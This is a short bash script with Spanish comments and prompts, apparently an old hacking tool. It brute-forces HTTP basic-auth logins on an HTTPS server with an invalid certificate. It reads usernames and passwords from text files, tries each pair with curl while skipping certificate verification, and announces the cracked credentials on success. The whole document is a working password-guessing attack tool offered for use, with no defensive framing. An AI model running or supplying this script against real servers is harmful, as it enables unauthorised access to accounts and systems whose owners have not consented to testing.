# HTTPS with Invalid Cert bruteforcer. httpsbf.sh
# hkm @ hakim.ws - 8/10/8
#
#bugs:
#Al llegar a EOF jode la vista
#Agregar mas threads

echo "\r\n[Bruteforce HTTPS con certificado invalido]"
echo "Colocar usuarios en users.txt y passwords en pass.txt\r\n"
echo " httpsbf.sh <https://servidor:puerto>\r\n"
if [ $1 ] 
then 
  https=$1;
else
  read -p "Introduce el servidor (ej https://servidor:puerto) : " https;
fi
echo "[+] Servidor: $https\r\n"

while read user
do
  while read pass
    do
    echo "[_] Intentando: $user:$pass...  "
    res=`0>testf.txt; curl -s -o testf.txt -f -k $https -u "$user:$pass"; sed -i '/^ *$/d' testf.txt; cat testf.txt;`;
    if [ "$res" = "" ]
    then
      echo "falso";
    else
      echo "ACEPTADO";
      echo "\r\n[+] CraCked!  $user:$pass ( $https )\r\n"
      rm testf.txt
      exit 0
    fi
  done < pass.txt
done < users.txt